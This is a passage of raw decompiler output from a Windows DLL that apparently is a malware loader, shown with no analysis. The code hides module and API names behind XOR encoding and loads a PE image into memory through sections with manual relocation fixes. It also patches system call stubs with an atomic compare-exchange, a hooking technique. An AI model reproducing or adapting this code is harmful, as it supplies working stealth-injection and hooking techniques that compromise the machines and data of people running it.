*)dword_100037B0 + 36; v10 = 0; v16 = sub_10002F0F( a1, v15 + (char *)RtlUnwind - (char *)(int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))byte_100037D9 + byte_100037D9 - (char *)dword_100037B0 + 36, (int)&v7, (int)&v11, (int)&v13); if ( v16 ) { result = v16; } else { v14 = v11; v11 += 36; v10 = 36; sub_10002FBF( (void **)&v11, v13, (int)&v10, v14 + 8, byte_100037D9, (char *)RtlUnwind - (char *)(int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))byte_100037D9); v8 = v10; sub_10002FBF((void **)&v11, v13, (int)&v10, v14 + 24, dword_100037B0, byte_100037D9 - (char *)dword_100037B0); v5 = v15; v6 = sub_10003336(); sub_10002FBF((void **)&v11, v13, (int)&v10, v14 + 16, v6, v5); v9 = (char *)&off_100037D2 - (char *)dword_100037B0 + v8 + v14; *(_DWORD *)((char *)&off_100037D2 - (char *)dword_100037B0 + v8 + v14) = *(_DWORD *)(v14 + 8) + &byte_100038A7 - byte_100037D9; *(_DWORD *)v14 = *(_DWORD *)(v14 + 16) + sub_10003340(); *(_DWORD *)(v14 + 4) = *(_DWORD *)(v14 + 16) + sub_1000334F(); *(_DWORD *)(v14 + 32) = a2; *(_DWORD *)a3 = *(_DWORD *)(v14 + 16); *(_DWORD *)a4 = v13; dword_10003C56(v14); dword_10003C7A(v7); result = 0; } return result; } // 100037B0: using guessed type int dword_100037B0[8]; // 100037D2: using guessed type char *off_100037D2; // 100038A7: using guessed type char byte_100038A7; // 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD); // 10003C7A: using guessed type int (__stdcall *dword_10003C7A)(_DWORD); // 10003C7E: using guessed type int __stdcall RtlUnwind(_DWORD, _DWORD, _DWORD, _DWORD); //----- (100034D2) -------------------------------------------------------- int __cdecl sub_100034D2(LPCWSTR lpString2, const void *a2, unsigned int a3, int a4) { int result; // eax@1 int v5; // eax@6 int v6; // ST14_4@9 int v7; // eax@9 DWORD v8; // [sp-4h] [bp-88h]@1 int v9; // [sp+0h] [bp-84h]@6 int v10; // [sp+0h] [bp-84h]@9 signed int v11; // [sp+0h] [bp-84h]@12 int v12; // [sp+4h] [bp-80h]@1 result = sub_1000300D((int)&v12, lpString2); if ( !result ) { if ( dword_10006010 && !sub_10002DD4(v8) ) return -12; v5 = (int)GetCurrentProcess(); v9 = sub_100030C2(v5, &v12, a2, a3, -1, 0, 0, (int)&dword_1000602C); if ( v9 ) return v9; if ( dword_10006010 ) { v6 = dword_1000602C; v7 = (int)GetCurrentProcess(); v10 = sub_1000335E(v7, v6, (int)&unk_10006030, (int)&dword_10006028); if ( v10 ) return v10; dword_10006010 = 0; } v11 = sub_1000320E(dword_10006028, dword_1000602C, &v12); if ( !v11 ) *(_DWORD *)a4 = *(_DWORD *)(dword_1000602C + 128); dword_10003C56(dword_1000602C); result = v11; } return result; } // 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD); // 10006010: using guessed type int dword_10006010; // 10006028: using guessed type int dword_10006028; //----- (100035ED) -------------------------------------------------------- int __cdecl sub_100035ED(LPCWSTR lpFileName, HANDLE hObject, int a3) { HANDLE v3; // eax@1 HANDLE v4; // edi@1 int result; // eax@2 DWORD v6; // ebx@3 void *v7; // eax@5 DWORD NumberOfBytesRead; // [sp+8h] [bp-Ch]@6 int v9; // [sp+Ch] [bp-8h]@1 DWORD FileSizeHigh; // [sp+10h] [bp-4h]@1 void *v11; // [sp+20h] [bp+Ch]@1 v4 = hObject; *(_DWORD *)a3 = 0; FileSizeHigh = 0; v9 = 0; *(_DWORD *)hObject = 0; v3 = CreateFileW(lpFileName, 0x80000000u, 1u, 0, 3u, 0, 0); v11 = v3; if ( v3 == (HANDLE)-1 ) { result = 0; } else { v6 = GetFileSize(v3, &FileSizeHigh); if ( v6 != -1 ) { if ( !FileSizeHigh ) { *(_DWORD *)a3 = v6; v7 = VirtualAlloc(0, v6, 0x3000u, 4u); *(_DWORD *)v4 = v7; if ( v7 ) { if ( ReadFile(v11, v7, v6, &NumberOfBytesRead, 0) && NumberOfBytesRead == v6 ) v9 = 1; else *(_DWORD *)v4 = 0; } } } CloseHandle(v11); result = v9; } return result; } //----- (1000368F) -------------------------------------------------------- BOOL __cdecl sub_1000368F(LPVOID lpAddress) { BOOL result; // eax@2 if ( lpAddress ) result = VirtualFree(lpAddress, 0, 0x8000u); return result; } //----- (100036A8) -------------------------------------------------------- int __cdecl sub_100036A8(int a1, int a2) { int result; // eax@1 int i; // ecx@3 char v4; // zf@5 result = a1; if ( a1 ) { for ( i = a2; ; ++i ) { v4 = *(_BYTE *)result == 18; *(_BYTE *)i = *(_BYTE *)result ^ 0x12; if ( v4 ) break; result += 2; } } else { result = a2; *(_BYTE *)a2 = 0; } return result; } //----- (100036CB) -------------------------------------------------------- __int16 __cdecl sub_100036CB(int a1, int a2) { int v2; // ecx@1 __int16 result; // ax@2 int v4; // edx@3 char v5; // zf@3 char v6; // zf@4 v2 = a1; if ( a1 ) { result = *(_WORD *)a1 ^ 0xAE12; v5 = *(_WORD *)a1 == -20974; v4 = a2; *(_WORD *)a2 = result; if ( !v5 ) { do { v2 += 2; v4 += 2; result = *(_WORD *)v2 ^ 0xAE12; v6 = *(_WORD *)v2 == -20974; *(_WORD *)v4 = result; } while ( !v6 ); } } else { result = 0; *(_WORD *)a2 = 0; } return result; } //----- (10003708) -------------------------------------------------------- HMODULE __cdecl sub_10003708() { const WCHAR ModuleName; // [sp+0h] [bp-C8h]@1 sub_100036CB((int)&unk_10005344, (int)&ModuleName); return GetModuleHandleW(&ModuleName); } //----- (10003733) -------------------------------------------------------- FARPROC __cdecl sub_10003733(int a1, int a2) { HMODULE v3; // eax@1 const WCHAR ModuleName; // [sp+0h] [bp-12Ch]@1 const CHAR ProcName; // [sp+C8h] [bp-64h]@1 sub_100036CB(a1, (int)&ModuleName); sub_100036A8(a2, (int)&ProcName); v3 = GetModuleHandleW(&ModuleName); return GetProcAddress(v3, &ProcName); } //----- (10003774) -------------------------------------------------------- void __cdecl sub_10003774(void *a1, const void *a2, unsigned int a3) { memcpy(a1, a2, a3); } //----- (10003788) -------------------------------------------------------- FARPROC __cdecl sub_10003788(int a1) { return sub_10003733((int)&unk_10005328, a1); } //----- (10003799) -------------------------------------------------------- FARPROC __cdecl sub_10003799(int a1) { return sub_10003733((int)&unk_10005344, a1); } //----- (100037D6) -------------------------------------------------------- #error "FFFFFFFF: positive sp value has been found (funcsize=0)" //----- (10003898) -------------------------------------------------------- #error "FFFFFFFF: positive sp value has been found (funcsize=0)" //----- (10003ACF) -------------------------------------------------------- void __fastcall sub_10003ACF(int a1, int a2) { unsigned int v2; // esi@1 int v3; // edx@1 int v4; // eax@3 int *v5; // [sp+4h] [bp-38h]@1 signed int v6; // [sp+8h] [bp-34h]@1 int v7; // [sp+Ch] [bp-30h]@1 int v8; // [sp+18h] [bp-24h]@2 int v9; // [sp+28h] [bp-14h]@1 int v10; // [sp+2Ch] [bp-10h]@1 char v11; // [sp+30h] [bp-Ch]@1 v10 = a1; v9 = a2; v6 = 28; v5 = &v7; sub_10003B11(); (*(void (__stdcall **)(int **, int *, signed int))(v3 + 12))(&v5, v5, v6); v2 = (unsigned int)&v11; do { if ( v2 >= v8 + v7 ) break; v4 = *(_DWORD *)v2; v2 += 4; } while ( (v4 ^ 0xAE1979DD) + 4 != v2 ); } //----- (10003B11) -------------------------------------------------------- void __cdecl sub_10003B11() { ; } //----- (10003B64) -------------------------------------------------------- int __usercall sub_10003B64(int a1, int a2, int a3) { int v3; // eax@1 int v4; // ecx@1 int v5; // edx@1 int v6; // eax@2 int v7; // edx@2 int v8; // ecx@2 int v9; // ST00_4@2 int v10; // edx@2 int v11; // edx@11 int v12; // eax@11 int v15; // [sp-10h] [bp-10h]@2 int v16; // [sp-Ch] [bp-Ch]@1 int v17; // [sp-8h] [bp-8h]@1 int v18; // [sp-4h] [bp-4h]@1 v18 = a1; v17 = a3; v16 = a2; sub_10003B11(); *(_DWORD *)(v5 + 4) = 0; v3 = (*(int (__stdcall **)(_DWORD, int))(v5 + 20))(*(_DWORD *)v5, v16); v4 = v17; if ( v3 ) { v17 = v3; v16 = v4; v15 = v3; v9 = v3; sub_10003B11(); v7 = (*(int (__stdcall **)(int, signed int, signed int, int *))(v10 + 16))(v9, 24, 128, &v15); v8 = v16; v6 = v17; if ( v7 ) { if ( *(_BYTE *)v17 == -72 ) { if ( *(_BYTE *)(v17 + 5) == -70 ) { if ( *(_WORD *)(v17 + 10) != -11521 ) { if ( *(_WORD *)(v17 + 10) != 4863 ) return v18; *(_BYTE *)(v17 + 11) = -46; } *(_DWORD *)(v6 + 6) = v8; return v18; } if ( *(_DWORD *)(v17 + 5) == 69489805 ) { if ( *(_DWORD *)(v17 + 8) == -1037120252 ) { *(_DWORD *)(v17 + 6) = v16 - v17 - 10; *(_BYTE *)(v6 + 5) = -24; *(_BYTE *)(v6 + 10) = -112; } } else { if ( *(_DWORD *)(v17 + 7) == 69489805 ) { if ( *(_DWORD *)(v17 + 11) == -1072300188 ) { if ( *(_DWORD *)(v17 + 15) == -1040187392 ) { v17 = v7; sub_10003B11(); *(_DWORD *)(v11 + 4) = 1; v16 = v12; _ESI = v12; __asm { lock cmpxchg8b qword ptr [esi+0Ah] } } } } } } } } return v18; } //----- (10003C84) -------------------------------------------------------- signed int __cdecl sub_10003C84(int a1) { int v2; // [sp-4h] [bp-9Ch]@3 int v3; // [sp+0h] [bp-98h]@8 int v4; // [sp+4h] [bp-94h]@5 int v5; // [sp+8h] [bp-90h]@11 int v6; // [sp+Ch] [bp-8Ch]@1 int v7; // [sp+10h] [bp-88h]@1 int v8; // [sp+14h] [bp-84h]@1 unsigned int v9; // [sp+18h] [bp-80h]@1 int v10; // [sp+1Ch] [bp-7Ch]@1 int v11; // [sp+20h] [bp-78h]@11 int v12; // [sp+24h] [bp-74h]@1 char v13; // [sp+28h] [bp-70h]@5 v7 = *(_DWORD *)(a1 + 32); v8 = (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9; sub_100040B7(&v9, (const void *)v7, 0x80u); v9 = (unsigned int)&v9 ^ 0xAE1979DD; v10 = 0; v12 = *(_DWORD *)(a1 + 4); v6 = sub_100041EB(v8, (int)&v9, *(const void **)(v7 + 140), *(_DWORD *)(v7 + 144)); if ( v6 ) return v6; v6 = sub_1000414D(a1, v8); if ( v6 ) return -4; v4 = (*(int (__thiscall **)(int, char *))(v8 + 36))(v2, &v13); if ( !v4 ) return -9; *(_DWORD *)(v7 + 128) = v4; if ( *(_DWORD *)(v7 + 148) != -1 ) { v3 = (*(int (__thiscall **)(int, _DWORD, signed int, _DWORD, int, _DWORD, _DWORD))(v8 + 52))( v4, 0, 524288, *(_DWORD *)a1, a1, 0, 0); if ( !v3 ) return -13; (*(void (__stdcall **)(int, signed int))(v8 + 56))(v3, -1); (*(void (__stdcall **)(int, int *))(v8 + 60))(v3, &v6); } v5 = v11; if ( v11 ) { v11 = 0; (*(void (__stdcall **)(int))(v8 + 64))(v5); } (*(void (__stdcall **)(int))(v8 + 28))(v7); return v6; } // 10003C3A: using guessed type int dword_10003C3A; //----- (10003E22) -------------------------------------------------------- int __stdcall sub_10003E22(int a1) { int result; // eax@2 int v2; // [sp+0h] [bp-Ch]@1 int v3; // [sp+4h] [bp-8h]@1 unsigned int v4; // [sp+8h] [bp-4h]@1 v3 = *(_DWORD *)(a1 + 32); v4 = (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9; v2 = (*(int (__stdcall **)(_DWORD, _DWORD))(v4 + 20))(*(_DWORD *)(v3 + 128), *(_DWORD *)(v3 + 148)); if ( v2 ) { ((void (__cdecl *)(_DWORD, _DWORD))v2)(*(_DWORD *)(v3 + 132), *(_DWORD *)(v3 + 136)); result = 0; } else { (*(void (__stdcall **)(_DWORD))(v4 + 40))(*(_DWORD *)(v3 + 128)); result = 0; } return result; } // 10003C3A: using guessed type int dword_10003C3A; //----- (10003E95) -------------------------------------------------------- int __cdecl sub_10003E95(int a1, int a2, int a3) { int result; // eax@1 *(_DWORD *)(a1 + 80) = *(_DWORD *)(a2 + 40) + *(_DWORD *)(a2 + 52); *(_DWORD *)(a1 + 84) = 0; *(_DWORD *)(a1 + 88) = *(_DWORD *)(a2 + 96); *(_DWORD *)(a1 + 92) = *(_DWORD *)(a2 + 100); *(_DWORD *)(a1 + 96) = *(_WORD *)(a2 + 92); *(_WORD *)(a1 + 100) = *(_WORD *)(a2 + 74); *(_WORD *)(a1 + 102) = *(_WORD *)(a2 + 72); *(_DWORD *)(a1 + 104) = 0; *(_WORD *)(a1 + 108) = *(_WORD *)(a2 + 22); *(_WORD *)(a1 + 110) = *(_WORD *)(a2 + 94); *(_WORD *)(a1 + 112) = *(_WORD *)(a2 + 4); *(_BYTE *)(a1 + 114) = 1; *(_BYTE *)(a1 + 115) = 4; *(_DWORD *)(a1 + 116) = *(_DWORD *)(a2 + 112); *(_DWORD *)(a1 + 120) = a3; result = a1 + 80; *(_DWORD *)(a1 + 124) = 0; return result; } //----- (10003F58) -------------------------------------------------------- signed int __stdcall sub_10003F58(int a1) { signed int result; // eax@3 int v2; // ST08_4@20 int v3; // [sp+8h] [bp-24h]@12 unsigned int v4; // [sp+Ch] [bp-20h]@12 unsigned int j; // [sp+10h] [bp-1Ch]@14 int v6; // [sp+18h] [bp-14h]@6 int v7; // [sp+1Ch] [bp-10h]@6 int v8; // [sp+24h] [bp-8h]@4 int i; // [sp+28h] [bp-4h]@10 if ( a1 && *(_DWORD *)a1 ) { v8 = *(_DWORD *)a1; if ( **(_WORD **)a1 == 23117 ) { v6 = *(_DWORD *)(*(_DWORD *)a1 + 60) + v8; v7 = v8 - *(_DWORD *)(v6 + 52); if ( v8 == *(_DWORD *)(v6 + 52) ) { result = 0; } else { *(_DWORD *)(v6 + 52) = v8; if ( *(_DWORD *)(v6 + 164) ) { for ( i = *(_DWORD *)(v6 + 160) + v8; *(_DWORD *)(i + 4); i += *(_DWORD *)(i + 4) ) { v4 = *(_DWORD *)(i + 4) - 8; v3 = i + 8; if ( v4 % 2 ) return -1073741800; for ( j = 0; j < v4 >> 1; ++j ) { if ( (unsigned __int8)(*(_WORD *)v3 >> 8) >> 4 ) { if ( (unsigned __int8)(*(_WORD *)v3 >> 8) >> 4 != 3 ) return -1073741800; v2 = (*(_WORD *)v3 & 0xFFF) + *(_DWORD *)i + v8; *(_DWORD *)v2 += v7; } v3 += 2; } } result = 0; } else { result = -1073741800; } } } else { result = -1073741819; } } else { result = -1073741819; } return result; } //----- (100040B7) -------------------------------------------------------- void __cdecl sub_100040B7(void *a1, const void *a2, unsigned int a3) { memcpy(a1, a2, a3); } //----- (100040CB) -------------------------------------------------------- int __cdecl sub_100040CB(const void *a1, int a2, void *a3) { int result; // eax@2 int v4; // [sp+0h] [bp-Ch]@1 int v5; // [sp+4h] [bp-8h]@1 int v6; // [sp+8h] [bp-4h]@1 v4 = *(_WORD *)(a2 + 6); sub_100040B7(a3, a1, *(_DWORD *)(a2 + 84)); v5 = a2 + *(_WORD *)(a2 + 20) + 24; v6 = 0; while ( 1 ) { result = v6; if ( v6 >= v4 ) break; if ( *(_DWORD *)(v5 + 16) ) sub_100040B7((char *)a3 + *(_DWORD *)(v5 + 12), (char *)a1 + *(_DWORD *)(v5 + 20), *(_DWORD *)(v5 + 16)); ++v6; v5 += 40; } return result; } //----- (1000414D) -------------------------------------------------------- signed int __cdecl sub_1000414D(int a1, int a2) { signed int result; // eax@2 int v3; // [sp+8h] [bp-Ch]@1 void *v4; // [sp+Ch] [bp-8h]@3 char v5; // [sp+10h] [bp-4h]@5 v3 = *(_DWORD *)a2; if ( *(_DWORD *)a2 ) { v4 = (void *)(v3 + 64); if ( *(_DWORD *)(v3 + 64) == -1421275077 ) { result = 0; } else { if ( (*(int (__stdcall **)(int, signed int, signed int, char *))(a2 + 16))(v3, 4096, 128, &v5) ) { sub_100040B7(v4, *(const void **)(a1 + 24), *(_DWORD *)(a1 + 28)); (*(void (__thiscall **)(void *))(a1 + 8))(v4); (*(void (__stdcall **)(signed int, _DWORD, _DWORD))(a2 + 32))(-1, 0, 0); result = 0; } else { result = -4; } } } else { result = 0; } return result; } //----- (100041EB) -------------------------------------------------------- signed int __cdecl sub_100041EB(int a1, int a2, const void *a3, int a4) { signed int result; // eax@2 int v5; // [sp+0h] [bp-1Ch]@3 int v6; // [sp+4h] [bp-18h]@5 int v7; // [sp+8h] [bp-14h]@5 int v8; // [sp+Ch] [bp-10h]@5 int v9; // [sp+10h] [bp-Ch]@7 int v10; // [sp+14h] [bp-8h]@5 const void *v11; // [sp+18h] [bp-4h]@1 *(_DWORD *)(a2 + 8) = 0; v11 = a3; if ( *(_WORD *)a3 == 23117 ) { v5 = (int)((char *)a3 + *((_DWORD *)v11 + 15)); if ( *(_DWORD *)v5 == 17744 ) { v6 = *(_DWORD *)(v5 + 80); v7 = 0; v8 = (*(int (__stdcall **)(int *, signed int, _DWORD, int *, signed int, signed int, _DWORD))(a1 + 44))( &v10, 983071, 0, &v6, 64, 134217728, 0); if ( v8 ) { result = -11; } else { v9 = (*(int (__stdcall **)(int, signed int, _DWORD, _DWORD, _DWORD))(a1 + 24))(v10, 6, 0, 0, 0); if ( v9 ) { *(_DWORD *)(a2 + 8) = v10; sub_100040CB(a3, v5, (void *)v9); sub_10003E95(a2, v5, a4); (*(void (__stdcall **)(int))(a1 + 28))(v9); result = 0; } else { (*(void (__stdcall **)(int))(a1 + 64))(v10); result = -10; } } } else { result = -2; } } else { result = -2; } return result; } //----- (100042CC) -------------------------------------------------------- void __cdecl sub_100042CC() { ; } #error "There were 2 decompilation failure(s) on 79 function(s)"